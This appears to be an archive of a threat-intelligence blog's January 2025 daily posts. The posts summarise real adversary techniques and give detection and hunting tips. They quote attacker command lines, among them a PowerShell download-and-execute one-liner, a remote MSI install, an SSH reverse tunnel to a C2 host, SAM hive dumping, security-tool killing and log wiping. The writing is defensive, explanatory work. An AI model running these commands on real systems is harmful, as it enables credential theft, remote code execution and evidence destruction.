Posts

Showing posts from January, 2025

031. What's Hex Staging and How to Detect It

Image
Hello everyone! Let's talk about Hex Staging technique. I saw it in Unit42 report on  CL-STA-0048 .  So, a threat actor incrementally writes hex-encoded data into a temporary file piece by piece, and evades defenses this way. For example: cmd.exe /c >> "path_to_temp_file" set /p="hex_encoded_data" To decode the hex data back into ASCII, the adversary leveraged certutil, for example: cmd.exe /c certUtil -decodehex "path_to_temp_file" "path_to_decoded_file" As you can see, detecting it is quite easy: Look for cmd.exe executions with " set /p= " in arguments Look for certutil.exe executions with " -decodehex " Make sure you've checked the report - there're lots of interesting techniques inside! See you tomorrow!

030. Ransomware Gangs Use SSH Tunneling for Stealthy Persistence in VMware ESXi infrastructure

Image
Hello everyone! Recently Sygnia shared their insights on how ransomware gangs abuse SSH for stealthy persistence and how to investigate such activity. To create a tunnel, the threat actors may use SSH binary: ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address> From incident response and forensics point of view, the following log files are the most interesting: /var/log/shell.log /var/log/hostd.log /var/log/auth.log /var/log/vobd.log Analysis of these files allows you to uncover lots of interesting events, for example, enabling of SSH access, disabling of firewall rules, SSH authentication into ESXi, etc. So, if you deal with modern ransomware attacks, being familiar with ESXi forensicating is a must! See you tomorrow!

029. Babuk or not Babuk?

Image
Hello everyone! Recently I saw a tweet claiming the infamous ransomware group Babuk is back. I hardly believe it's true, most likely it's another imposter. In one of SANS Threat Analysis Rundown episodes we discussed how leaked ransomware source code is lowering the bar for adversaries, so I decided to share it with you today: See you tomorrow!

028. SANS Cyber Threat Intelligence Summit 2025: My Picks (Day 2)

Image
Hello everyone! I hope you're enjoying the summit! Today I decided to share my picks for day 2 ! Mental health is extremely important, so I'll definitely attend the keynote: Your Mental Health & Well-Being: Combating the Adversaries of Stress & Burnout in Cybersecurity Clustering is always a hot topic, so this talk is also in my must-attend list: What a Cluster - A Case Study in Threat Actor Collaboration and Framework for Comparative Attribution The following talk also looks interesting enough for me: Sales And Marketing Are Threat Actors, Too Again, I'm planning to attend most of the talks, but these cought my eye first. See you tomorrow!

027. SANS Cyber Threat Intelligence Summit 2025: My Picks (Day 1)

Image
Hello everyone! Today is the first day of  SANS Cyber Threat Intelligence Summit 2025 . So I decided to highlight talks I want to attend most.  I always enjoy ramsomware-related talks, so I'll definitely attend the following talks: Ransomware Syndicates: Cartels or Twisted Tech Unicorns? Dissecting the Cicada - In the shadow of the Black Cat As you already know, I enjoy detection engeneering as well, so the following talk is also in my list: From Threat Intelligence to Detection Engineering: A Case Study on Identifying Gaps in Detection and Enhancing CTI Value for the Organization It's not always possible and easy to split multiple kill chains during an incident response engegement, so this talk seem very interesting to me as well: Advanced Threat Research Methodologies: Unraveling a Triple-APT Intrusion It doesn't mean other talks are not interesting, I plan to attend all of them, but these four caught my eye. Hope you'll enjoy the summit too! See you tomorrow!

026. Threat Actors Abuse Printui.exe for DLL Search Order Hijacking

Image
Hello everyone! In some cases even threat actors involved in cryptomining malware distribution leverage quite curious techniques. Today we'll look at an activity cluster colleagues from Red Canary track as  Tangerine Turkey (I like their taxonomy as well (Hi Katie and team :)). So, it's a worm, it's delivered via USB (yes, again), and it abuses printui.exe to run a cryptominer. Let's look how it works. Once the victim opens a malicious LNK file on an infected USB drive, wscript.exe executes a script: Look for suspicious VBS files executions from USB drives, for example:  WScript.exe "D:\rootdir\x455198.vbs" The script executes a BAT file from the same location. This file creates a new folder ( mkdir "\\?\C:\Windows \System32" ), abuses xcopy to copy printui.exe ( xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y ), copies malicious DAT file ( xcopy "x805299.dat" "%SystemDrive%\Windows \System32...

025. Silent Lynx Campaign: Detection Opportunities

Image
Hello everyone! Today we're going to talk about an activity cluster, which researches from Seqrite named Silent Lynx . It's also known as YoroTrooper and SturgeonPhisher, and according to Cisco Talos has Khazakhstan origin. BI.ZONE Threat Intelligence team tracks this cluster under the name Cavalry Werewolf . Seqrite researchers uncovered two campaigns:  RAR archives with malicious ISO files. These files contained decoy documents and C++ loaders. RAR archives with decoy documents and Golang reverse-shell. As always, let's look at detection and hunting opportunities. First, ISO files are usually very small, and it's not common: Look for small ISO files with executable contents Look for small ISO files in Downloads , Documents and Desktop folders Next thing, the loader used PowerShell to communicate with Telegram API, receive and run commands, and send back the output or errors: Look for PowerShell execution with  -NoProfile -ExecutionPolicy Bypass -e and long Base64...

024. PlushDaemon Supply-Chain Attack: Detection Opportunities

Image
Hello everyone! Recently ESET published a report  on a supply-chain attack against a VPN provider in South Korea. The group behind the attack is named PlushDaemon. Despite the fact supply-chain attacks are quite hard to detect, we always have lots and lots of detection opportunities for post-exploitation! Let's look at some of them. The adversary abused legitimate  regcap.exe utility (included in Visual Studio) to side-load a malicious DLL -  lregdll.dll . The utility was renamed to  PerfWatson.exe . So, what to look for? Renamed regcap.exe execution from suspicious locations, for example, subfolders of %PUBLIC% (metadata will help you) Loading of DLLs from suspicious locations, often matching with the binary used for side-loading Next thing - persistence. The adversary used less common mechanisms, so it's also quite easy to detect: Look for  Userinit entry modifications under  HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon registry...

023. Detecting a Gamaredon Copycat

Image
Hello everyone! Recently Knownsec 404 Team released a report on activity cluster we track as Core Werewolf. The cluster is quite active and uses simple, but effective methods. In most cases they rely on legitimate remote access software - UltraVNC. At the same time, installation routine is very noisy, so let's talk about detection and hunting opportunities! As I mentioned already, the adversary leveraged UltraVNC, but it's always renamed. We can use it together with typical command line arguments to build pseudo-detector: process_name != "WinVNC.exe" && command_line_includes : ("-autoreconnect" && "-connect") && process_pe_original_file_name == "WinVNC.exe" Another example: the threat actors abused taskkill to stop the process. Again, we can use this information to build another pseudo-detector: process_name == "taskkill.exe" && command_line_includes : ("/f" && "/im") ...

022. That's How FIN7 Uses Malicious JAR Files

Image
Hello everyone! Yesterday we talked about malicious JAR files. And guess what? I just ran into a fresh report from Sophos MDR team - they show how notorious FIN7 uses such files. Let's start from how these files were delivered to the compromised system - it's also very interesting. First, the adversary sent a large volume of spam messages (over 3000). Shortly after the victim received a Teams call. The threat actor impersonated a help desk specialist and asked to allow a remote screen control session through Teams. Using this session to drop malicious files to the compromised system. And yes, the first stage is a JAR file, which was executed through the same remote session: C:\Users\Public\Documents\MailQueue-Handler\jdk-23.0.1\bin\javaw.exe -jar C:\Users\Public\Documents\MailQueue-Handler\MailQueue-Handler.jar Another malicious JAR file leveraged by the threat actors is a credential harvester: “C:\Users\Public\Documents\MailQueue-Handler\jdk-23.0.1\bin\javaw.exe” -jar C:\Use...

021. Do You Think This Java.exe is Legitimate?

Image
Hello everyone! Today we're going to talk about malicious JAR files, and look at activity cluster we track as Bloody Wolf , which mostly targets Kazakhstan. So, this cluster leverages phishing emails to deliver PDF documents, which contain links to malicious JAR files. Interesting enough, such PDF files even have instructions on how to download and install Java. One may think that adversaries won't compromise anybody using such approah. And won't be right. Recent campaign we tracked led to hundreds of systems being compromised!  Ok, let's look at some detection opportunities: Execution of JAR files from unexpected locations using java.exe -jar Creation of scheduled tasks for JAR files with schtasks Network connections to  pastebin[.]com initiated by JAR files These are just a few examples, there are more, of course! Spotted it? Share in the comments section! See you tomorrow!

020. Play Ransomware Gang's Reconnaissance Tool Looks Like Legitimate Security Software

Image
Hello everyone! Field Effect presented a report on Grixba - a notorious reconnaissance tool used by Play ransomware affiliates.  The tool allows adversaries to collect information about remote systems, installed software (including security, backup and remoste access software), browser history, processes, network, etc. An interesting thing about this version of the tool - it's designed to look like SentinelOne Compabilty Wizard! At the same time, it's not signed, and it gives us a good detection opportunity: It's not the first time Play ransomware affiliates used Grixba masquaraded like this. Trend Micro also spotted similar version of the tool during one of their incident response engagements.  Reconnaissance tools and techniques are extremely common, so it's great point to focus on to stop attacks on early stages. See you tomorrow!

019. Here's Another Rootkit Remover Commonly Abused by Threat Actors

Image
Hello everyone! One of my blog readers, Jefferson , suggested to blog about another tool commonly abused to disable AV and EDR - GMER .  Back in a day, we even used during incident responce engagements, but nowasdays it's commonly abused by various ransomware gangs, for example, BlackSuit . Despite the fact activity related to GMER may be legitimate, it's good to have proper detections and respond accordingly as it may be a ransomware precursor! So, here're some detection opportunities: Dropping SYS files with metadata related to GMER: "GMER", "gmer.sys", etc. Creating a service for aforementioned SYS file GMER execution with -killfile option At the same time, GMER is detected quite well by many antivirus engines: What does it mean? The most important thing - to respond properly! See you tomorrow!

018. That's How Real Adversaries Abuse Wksprt.exe and Use DLL Proxying

Image
Hello everyone! Cyble shared a research on a recent campaign targeting organizations in Germany. Two things caught my attention - abusing wksprt.exe (RemoteApp and Desktop Connection Runtime) for sideloading and using DLL proxying. Interesting enough that the theat actors copied this legitimate file from the compromised system to a newly created folder using xcopy: xcopy /Y /I C:\Windows\System32\wksprt.exe "C:\Users\<USER>\AppData\Local\InteI\" This legitimate executable is used to sideload a malicious DLL (IPHLPAPI.dll), which loads renamed legitimate DLL (IPHLPLAPI.dll), both from the same folder. The malicious DLL acts as a proxy to forward function calls to the legitimate DLL. At the same time, the malicious DLL read the contents of the file ccache.dat to decrypt the shellcode and retrieve the final payload - a Sliver implant. Despite the fact the adversary leverages quite sophisticated techniques like DLL proxying, the infection process is extremely noisy, fo...

017. Star Blizzard and Stolen WhatsApp accounts

Image
Hello everyone! Yesterday Microsoft Threat Intelligence team shared some information on Star Blizzard's campaign targeting WhatsApp accounts.  So, the adversary sends a phishing email a quick response (QR) code purporting to direct users to join a WhatsApp group: An example of phishing email But the QR code is not valid, so if the victim responds with an email, the threat actors send another message, this time with a link, which leads to a phishing page with instructions how to "join the group". The QR code on the page allows the adversary to connect an account to a linked device and/or the WhatsApp Web portal, and exfiltrate messages. Here are the indicators of compromise presented by Microsoft: civilstructgeo[.]org aerofluidthermo[.]org See you tomorrow!

016. Good and Bad USB Drives

Image
Hello everyone! French authorities and the FBI removed PlugX malware from more than 4 200 compromised devices. So, let's talk a bit about not so common initial access techniques leveraged by one of the group operating it. Yes, I'm talking about Mustang Panda (Horned Werewolf or Twill Typhoon) again. We already got used to phishing emails, exploiting public-facing applications, abusing external remote services and even supply-chain attacks. But what about USB drives? Yes, that's one of the ways how activity cluster mentioned above distributed PlugX variant. Once a USB drive is inserted to an infected computer, the malware creates a hidden folder structure and copies PlugX components to it. Also it creates an LNK file pointing to a legitimate executable used for side-loading. Details on the infection process can be found, for example, in this report . Ok, what to look for? For example: Executions from USB drives, especially from suspicious locations, like RECYCLER.BIN folder ...

015. Threat Actors Can Abuse Even This Kind of Software

Image
Hello everyone! Recent Unit 42 notification reminded me about VERY curious legitimate software abused by adversaries. It's BOINC or Berkeley Open Infrastructure for Network Computing - open-source software that allows users to contribute computing power to scientific research projects focused on solving complex calculations. Infection process is interesting as well. The victim is redicrected to a malicious website with fake checks and is instructed to paste and run a PowerShell script: powershell -WindowStyle Hidden $global:block=curl -useb hxxp[:]//lggknhaffleahbh[.]top/1.php?s=527;iex $global:block.content The script leads to installation of BOINC client. Why does adversary use BOINC? It can collect information and send tasks to the host for execution! So, what to look for? Here're a few detection and hunting tips: Look for renamed BOINC executables Look for executables with metadata related to BOINC, for example: "BOINC Client", "boinc.exe", etc. See you...

014. Encrypting S3 Buckets Abusing Native AWS Services

Image
Hello everyone! Let's talk a bit about the cloud. Yes, such services also affected by ransomware. For example, this report by Halcyon demonstrates how adversaries abuse native AWS services to encrypt S3 buckets. The threat actor named Codefinger leveraged compromised AWS keys to start the encryption process by calling the x-amz-server-side-encryption-customer-algorithm header. As only an HMAC (hash-based message authentication code) is logged in AWS CloudTrail, it's impossible to recover the key and decrypt the data. The adversary also abused S3 Object Lifecycle Management API to mark files for deletion within 7 days.  This case once again shows the importance of reviewing and monitoring AWS keys as well as implementing advanced logging capabilities in order to to detect unusual activity. See you tomorrow!

013. It Can Remove Rootkits. And Your EDR!

Image
Hello everyone! Let's talk about about another very curious tool abused by threat actors. For example, it was used by LockBit and RansomHub ransomware affiliates. Guessed it already? Yes, I'm talking about TDSSKiller - a legitimate rootkit removal tool by Kaspersky. Despite the fact it was developed for malware removal, it can also be used by adversary to remove security software.  For example, here's how RansomHub affiliates used it to disable Trend Micro service according to this report : C:\Windows\tdsskiller.exe -dcsvc "TMBMServer" -accepteula By the way, according to VirusTotal, this tool isn't detected by many antivirus engines: Still, we have a few detection and hunting opportunities, for example: Command line parameters typical for the tool:  -dcsvc Metadata indicating the executable is TDSSKiller: "TDSSKiller", "TDSS rootkit removing tool" Do you know any other curious legitimate tools used to disable EDR? See you tomorrow!

012. They Want to Know Everything About Your System!

Image
Hello everyone! Today we'll look at reconnaissance techniques leveraged by Secret Blizzard (also known as Turla) as seen in the report by Microsoft Threat Intelligence.  In this campaign Secret Blizzard used the Amadey bot to download its own backdoors to specifically selected target devices associated with the Ukrainian military. So, one of the batch scripts leveraged by adversary invoked lots of reconnaissance commands. Let's look at each of them: ver - to collect information about OS version; systeminfo - to collect compromised system information; ipconfig /all - to collect the full TCP/IP configuration for all adapters; ipconfig /displaydns - to collect the contents of the DNS client resolver cache; route print - to collect the entries in the local IP routing table; arp -a - to collect information on current arp cache tables for all interfaces; netstat -a -n - to collect information on active network connections; net share - to collect information on ...

011. Red Wolf Toolset Update

Image
Hello everyone! Adversary toolset is always evolving, and today we'll look at another example demonstrating it. Recently Huntress published a report on Red Wolf (also known as RedCurl and Earth Kapre) attacks against several organizations in Canada. The report includes information on a tool we haven't observed to be used by this activity cluster. I'm talking about RPIVOT - tool written in Python for SOCKS tunneling. To execute the tool, the adversary used the following command: pcalua.exe -a conhost.exe -c --headless C:\ProgramData\ControlsUp\python.exe C:\ProgramData\ControlsUp\cl\cl.py --s 188.130.207[.]253 --p 10310 As you can see, we have lots of detection and hunting opportunities: The threat actors abused pcalua.exe using -a parameter for proxy execution. They also leveraged conhost.exe with -c and --headless parameters to hide child process window. The adversary used python.exe to execute a script from suspicious folder - a good hunting candidate. Finally, RPIVOT h...

010. Do You Detect This Example of PowerShell Abuse?

Image
Hello everyone! As you know, PowerShell can be used by the adversary to solve lots of problems, and it's almost impossible to cover all available procedures. Today we are going to look at another curious example of PowerShell abuse. Recently Recorded Future released a report on RedDelta (we track this cluster of espionage activity as Horned Werewolf), which targeted Taiwan, Mongolia, and Southeast Asia with PlugX. Just like Sticky Werewolf we discussed a few days ago, the adversary leveraged maicious MSC files. These files abused PowerShell to install an malicious MSI file from a remote resource: powershell.exe -w hidden ($ceed=new-object -comobject ‘WindowsInstaller.Installer’); ($ceed.uilevel = 2); ($ceed.installproduct(‘https[:]//versaillesinfo[.]com/brjwcabz’,’REMOVE=ALL’)); ($ceed.installproduct(‘https[:]//versaillesinfo[.]com/brjwcabz’)) Make note that malicious MSI file don't have an .msi extension. The threat actors leveraged Installer object to silently (Installer.UI...

009. Anti-Forensics and China-nexus

Image
Hello everyone! Mandiant has identified zero-day exploitation of CVE-2025-0282 in the wild beginning mid-December 2024. The vulnerability impacts Ivanti Connect Secure VPN appliances, and successful exploitation could result in unauthenticated remote code execution. This activity was attributed to a China-nexus cluster. Despite the fact threat actors used a zero-day to gain initial access, there are lots of detection and hunting opportunities for post exploitation! Let's focus on anti-forensics techniques: The adversary leverages dmesg with -C parameter for removing entries from the debug logs:  dmesg -C Used sed with -i parameter to remove various log application event log entries:  sed -i '/segfault/d' debuglog Deleted state dumps and any core dumps using rm with -rf parameters:  rm -rf /data/var/statedumps/* As you can see, threat actors may make forensic examination a tough task. At the same time, anti-forensic methods often quite common and easy dete...

008. How Stealthy is Installation of an Advanced Backdoor?

Image
Hello everyone! Yesterday I checked a fresh report by Kaspersky on EAGERBEE backdoor , which has potrntial conections with the CoughingDown threat group. So, we already talked a bit about how noisy are APT groups in reality and how easy it is to detect malicious activity if you really want to, and this backdoor is another great example. Let's look at installation routine described in the report. First of all, to harden forensic analysis, the adversary leverages timestomping technique abusing PowerShell: powershell.exe -Command "='1/8/2019 9:57'; = 'C:\users\public\ntusers0.dat';(Get-Item ).creationtime = ;(Get-Item ).lastaccesstime = ;(Get-Item ).lastwritetime = " Remember, PowerShell can be used to solve hundreds of tasks during the attack lifecycle, so make sure you have detection analytics for timestomping. Another technique used during the installation routine - changing file attributes to hide them abusing attrib.exe: attrib.exe +s +h +a C:\users\publ...

007. A Curious Case of Microsoft Management Console Abuse

Hello everyone! As you know, phishing emails are still the most common way to deliver malware. Malicious attachments may include Microsoft Word documets, Microsoft Excel spreadsheets, executables with double extention, LNK files and many others. Some time ago we observed Sticky Werewolf to use MSC files to deliver Sliver implant to the compromised system. Windows MSC files are used in the Microsoft Management Console to manage various aspects of the operating system or create custom views of commonly accessed tools. Despite the fact it's not very common file type used by adversaries, installation routine is quite noisy and offers defenders lots of detection and hunting opportunities, for example: Execution of MSC files from suspicious locations with mmc.exe ( mmc.exe C:\Users\Victim\AppData\Local\Temp\17_09_2024.msc ) Certutil abuse for decoding MSC files ( certutil -decode """C:\Users\Victim\AppData\Local\Temp\17_09_2024.msc""" C:\Users\Victim\AppDat...

006. They Will Steal All Passwords from Any App with This Tool

Image
Hello everyone! As you know, almost any attack includes credential access stage. I think, many of you are well aware of tools like Mimikatz or LaZagne. But threat actors may be much more creative in their attempts to obtain credential material. For example, recently we saw threat actors, involved in ransomware attacks in CIS, actively used  XenArmor All-In-One Password Recovery Pro . It's a legitimate tool for password recovery, which allows to recover data from 270+ various applications. Not bad, right? Of course, it's used beyond CIS as well. For example, it was used by a ransomware gang behind AvosLocker . Also, it's widely used as a malware module, for example, XWorm . Currently, it's detected quite well by various antivirus software as seen on VirusTotal : Also, here are some detection and hunting tips if you don't trust your security software: Look for files with "XenArmor All-In-One Password Recovery Pro", "All-In-One Password Recovery Pro...

005. Is It Difficult to Spot a Russian APT?

Hello everyone! Let's continue to talk about APTs. I think many of you read this report by Volexity, where they introduced the Nearest Neighbor Attack. APTs often use very sophisticated techniques to obtain the initial access to the target network and the Nearest Neighbor Attack is a good example. But it's almost impossible to be very sophisticated throughout the attack lifecycle. What's does it mean for defenders? Detection opportunities! For example, the adversary attempted to extract the Security Account Manager (SAM) database from the Registry with Reg: reg save hklm\sam C:\ProgramData\sam.save reg save hklm\security C:\ProgramData\security.save reg save hklm\system C:\ProgramData\system.save Quite noisy and suspicious behaviour, isn't it? Another noisy technique is abusing cipher.exe: cmd.exe /c cipher /W:C Abusing this tool allowed threat actors to overwrite deleted data and make it difficult for incident responders to recover their toolset.  It's not the fir...

004. Are You Forensicating Here or What?

Hello everyone! During incident response engagements we often use various forensic tools, right? For example, to dump memory. But do you know that adversaries may do the same with the same tools? Why? Because dumping LSASS is way too noisy nowadays. And yes, you can extract credentials from full memory dump as well.  We saw this approach in-the-wild for the first time responding to Gremlin Wolf (also known as OldGremlin and TinyScouts). This ransomware gang used WinPmem to dump compromised system memory and access available credentials. It's not the only example of forensic tools abuse. For example, Lorenz ransomware gang leveraged Magnet RAM Capture to obtain a memory dump. In some cases threat actors even used another forensic tool - Volatility - to extract credentials from the memory dump directly on the compromised host. As you can see, forensic tools, just like many other legitimate tools, may be used to by adversary to solve various problems. There are even more examples! D...

003. Are they that advanced? Spotlighting Salt Typhoon

Hello everyone! I'm not sure about you, but I often ask myself one question: "Are Advanced Persistent Threats that advanced?". We are tracking lots of adversaries, mostly those targeting CIS. I also read lots and lots of public reports. And you know what? Yes, many modern threat actor use custom malware, for example, but at the same time, their behaviors are quite easy to detect, especially if you have good threat intelligence sources. So, in "Are they that advanced?" series we'll look at various APTs from the headlines in order to find low-hanging fruits for detection and hunting. Let's start from Salt Typhoon (yes, I like Microsoft naming taxonomy), which, according to news, successfully compromised at least eight U.S. telecommunication networks, including AT&T and Verizon. First of all, the threat actors use well-known vulnerabilities in public-facing applications, for example, Ivanti Connect Secure VPN and Microsoft Exchange. I'm sure, it...

002. Beyond Good Old Run Key

Image
Hello everyone! Today we're going to talk about a very common sub-technique - T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder. But let's look at an interesting example, of course. I think, almost any malware family uses this sub-technique for persistense. Why? Because Run keys and startup folders also commonly used by legitimate software to autorun, so this way adversaries may blend with the compromised environment. If we look into MITRE ATT&CK page for this sub-technique, we may notice that there are more interesting registry keys. For example, this one on the screenshot. It's less common, of course, but recently we observed it to be used by Paper Werewolf  activity cluster. And there's quite interesting thing about it. On one hand, using this key is not very common and may allow adversaries to bypass certain defenses, but on the other hand - the fact it's not very common makes such behavior really easy to detect! By the way, if...

001. The Zeltser Challenge

Image
Hello everyone! Happy New Year! New year - new challenges! So, a few weeks ago David Cowen reminded me about the Zeltser challenge. What's the point? You must blog every day for a year to push yourself to research and write. Sound cool, right? Dave suggested to start the challenge with him on 1/1/25, and that's why you are reading this post! So, what am I going to share here? I'm a big fan of intelligence-led approach to cyber defense, so every day we'll look at this or that technique (or sub-technique) leveraged by real adversaries, so we can learn more about our enemies.  We'll look both at public reporting and private findings by BI.ZONE Threat Intelligence team. Stay tuned, and see you tomorrow!